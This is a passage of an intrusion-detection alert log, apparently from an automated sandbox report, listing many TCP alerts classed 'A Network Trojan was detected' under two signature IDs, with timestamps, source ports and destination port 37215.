          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546666
          SID:2829579
          Source Port:45294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786563
          SID:2835222
          Source Port:37706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846733
          SID:2829579
          Source Port:47006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446624
          SID:2835222
          Source Port:43034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901667
          SID:2829579
          Source Port:50938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788282
          SID:2829579
          Source Port:56266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731357
          SID:2829579
          Source Port:53140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896116
          SID:2829579
          Source Port:48478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731770
          SID:2835222
          Source Port:51822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176637
          SID:2835222
          Source Port:38032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237591
          SID:2835222
          Source Port:38334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177983
          SID:2835222
          Source Port:53324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858374
          SID:2829579
          Source Port:44526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705428
          SID:2835222
          Source Port:51456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442294
          SID:2835222
          Source Port:37700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731887
          SID:2829579
          Source Port:39022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601403
          SID:2829579
          Source Port:47332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822702
          SID:2835222
          Source Port:37904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514305
          SID:2829579
          Source Port:58736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440919
          SID:2835222
          Source Port:55810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705687
          SID:2835222
          Source Port:43062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409931
          SID:2835222
          Source Port:37676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113973
          SID:2835222
          Source Port:58078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014768
          SID:2835222
          Source Port:42636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191842
          SID:2835222
          Source Port:47824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604446
          SID:2829579
          Source Port:49778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781196
          SID:2835222
          Source Port:54392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817678
          SID:2835222
          Source Port:51308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861105
          SID:2835222
          Source Port:45802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745736
          SID:2829579
          Source Port:35474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861323
          SID:2829579
          Source Port:40466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014714
          SID:2835222
          Source Port:40938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264167
          SID:2835222
          Source Port:45692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169415
          SID:2835222
          Source Port:59354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042327
          SID:2829579
          Source Port:45508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471401
          SID:2835222
          Source Port:46972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912748
          SID:2835222
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733355
          SID:2835222
          Source Port:43934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.823737
          SID:2835222
          Source Port:53122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734627
          SID:2829579
          Source Port:43618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.805970
          SID:2829579
          Source Port:37690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741365
          SID:2829579
          Source Port:35132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396784
          SID:2835222
          Source Port:53426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262842
          SID:2829579
          Source Port:42272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099455
          SID:2829579
          Source Port:40900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673817
          SID:2835222
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815596
          SID:2829579
          Source Port:43826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178888
          SID:2829579
          Source Port:46632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270754
          SID:2829579
          Source Port:48528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466171
          SID:2829579
          Source Port:43646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731846
          SID:2829579
          Source Port:51134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160476
          SID:2835222
          Source Port:39170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797310
          SID:2835222
          Source Port:39962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599214
          SID:2835222
          Source Port:40046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351162
          SID:2829579
          Source Port:57846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747078
          SID:2829579
          Source Port:39508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056441
          SID:2829579
          Source Port:40506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602939
          SID:2835222
          Source Port:55844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075741
          SID:2829579
          Source Port:58296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134250
          SID:2835222
          Source Port:46196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269810
          SID:2835222
          Source Port:59612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017152
          SID:2835222
          Source Port:32858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896841
          SID:2829579
          Source Port:49578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127337
          SID:2829579
          Source Port:52954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099280
          SID:2835222
          Source Port:35674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404386
          SID:2829579
          Source Port:36818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108088
          SID:2829579
          Source Port:57914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036223
          SID:2829579
          Source Port:43414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.080337
          SID:2829579
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670000
          SID:2835222
          Source Port:35720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462350
          SID:2829579
          Source Port:47738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276350
          SID:2835222
          Source Port:48378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187748
          SID:2829579
          Source Port:53070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444390
          SID:2835222
          Source Port:45776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462234
          SID:2829579
          Source Port:51582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464919
          SID:2829579
          Source Port:60720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237232
          SID:2829579
          Source Port:52394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113191
          SID:2835222
          Source Port:51508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448526
          SID:2829579
          Source Port:43368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456243
          SID:2829579
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449717
          SID:2829579
          Source Port:39136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465272
          SID:2835222
          Source Port:57430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135955
          SID:2835222
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822946
          SID:2829579
          Source Port:36846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911913
          SID:2829579
          Source Port:42640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.189177
          SID:2829579
          Source Port:54462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271227
          SID:2835222
          Source Port:47346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890813
          SID:2829579
          Source Port:52604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.174722
          SID:2829579
          Source Port:52218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740183
          SID:2835222
          Source Port:58494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672830
          SID:2829579
          Source Port:42358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396249
          SID:2829579
          Source Port:47476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551556
          SID:2829579
          Source Port:53510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160571
          SID:2829579
          Source Port:55758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860115
          SID:2829579
          Source Port:46124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912428
          SID:2829579
          Source Port:45402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306575
          SID:2835222
          Source Port:40788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111134
          SID:2829579
          Source Port:34068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115721
          SID:2829579
          Source Port:36848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.842952
          SID:2835222
          Source Port:56328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356555
          SID:2829579
          Source Port:60616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546765
          SID:2829579
          Source Port:56036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.158131
          SID:2835222
          Source Port:59684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513611
          SID:2829579
          Source Port:54556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128646
          SID:2835222
          Source Port:44834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168539
          SID:2835222
          Source Port:36532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115202
          SID:2829579
          Source Port:38924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740056
          SID:2829579
          Source Port:39602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512869
          SID:2829579
          Source Port:47608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549313
          SID:2835222
          Source Port:49620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670116
          SID:2835222
          Source Port:39104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734402
          SID:2829579
          Source Port:37714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796497
          SID:2835222
          Source Port:53414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709626
          SID:2835222
          Source Port:33782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805754
          SID:2829579
          Source Port:33024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130577
          SID:2829579
          Source Port:58118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079587
          SID:2835222
          Source Port:50732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709757
          SID:2829579
          Source Port:35670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135069
          SID:2835222
          Source Port:43054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670583
          SID:2829579
          Source Port:47096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892047
          SID:2829579
          Source Port:43494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272310
          SID:2835222
          Source Port:56010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116632
          SID:2829579
          Source Port:57936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808816
          SID:2829579
          Source Port:45614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178327
          SID:2829579
          Source Port:35038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110858
          SID:2835222
          Source Port:57330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600940
          SID:2835222
          Source Port:44094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356611
          SID:2829579
          Source Port:42078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099391
          SID:2835222
          Source Port:60986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112635
          SID:2829579
          Source Port:44566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911524
          SID:2835222
          Source Port:42908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055550
          SID:2835222
          Source Port:49346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841876
          SID:2829579
          Source Port:50284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600734
          SID:2829579
          Source Port:59970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115461
          SID:2835222
          Source Port:36536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163815
          SID:2829579
          Source Port:39740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598789
          SID:2829579
          Source Port:48038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440937
          SID:2829579
          Source Port:44416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911969
          SID:2835222
          Source Port:59584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238486
          SID:2829579
          Source Port:57934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.801045
          SID:2829579
          Source Port:58832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176834
          SID:2835222
          Source Port:59290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188996
          SID:2835222
          Source Port:39282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551752
          SID:2829579
          Source Port:45774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817755
          SID:2829579
          Source Port:34246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512179
          SID:2829579
          Source Port:51442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739231
          SID:2829579
          Source Port:50456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463968
          SID:2835222
          Source Port:41470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099488
          SID:2835222
          Source Port:47846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041983
          SID:2835222
          Source Port:53096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672869
          SID:2835222
          Source Port:47574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055297
          SID:2829579
          Source Port:34368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162613
          SID:2835222
          Source Port:59158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893753
          SID:2829579
          Source Port:50280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667017
          SID:2835222
          Source Port:57104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896469
          SID:2835222
          Source Port:33586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601301
          SID:2835222
          Source Port:50820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673764
          SID:2829579
          Source Port:49038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020979
          SID:2835222
          Source Port:58024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134206
          SID:2829579
          Source Port:53414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394420
          SID:2829579
          Source Port:44366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510424
          SID:2829579
          Source Port:47848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811655
          SID:2829579
          Source Port:36460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127955
          SID:2829579
          Source Port:44552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672947
          SID:2829579
          Source Port:45300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019610
          SID:2829579
          Source Port:52658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744154
          SID:2835222
          Source Port:43156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112051
          SID:2835222
          Source Port:48422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.807298
          SID:2829579
          Source Port:34252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897326
          SID:2829579
          Source Port:42206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602175
          SID:2835222
          Source Port:44010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822575
          SID:2835222
          Source Port:56666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160978
          SID:2829579
          Source Port:54126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184078
          SID:2829579
          Source Port:50446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356125
          SID:2829579
          Source Port:46034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153658
          SID:2829579
          Source Port:40140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113722
          SID:2829579
          Source Port:33604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174536
          SID:2829579
          Source Port:35410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862393
          SID:2829579
          Source Port:46890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817044
          SID:2829579
          Source Port:35586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131457
          SID:2829579
          Source Port:50518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353028
          SID:2829579
          Source Port:44898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087538
          SID:2835222
          Source Port:56560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127196
          SID:2829579
          Source Port:48454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862008
          SID:2835222
          Source Port:51418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602704
          SID:2835222
          Source Port:41570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.676249
          SID:2829579
          Source Port:41034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112499
          SID:2829579
          Source Port:40518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273214
          SID:2829579
          Source Port:43152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173663
          SID:2835222
          Source Port:50736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854239
          SID:2835222
          Source Port:55920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709655
          SID:2835222
          Source Port:44998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406289
          SID:2835222
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509577
          SID:2835222
          Source Port:38958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352840
          SID:2829579
          Source Port:38320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861175
          SID:2829579
          Source Port:60480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708744
          SID:2835222
          Source Port:57474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
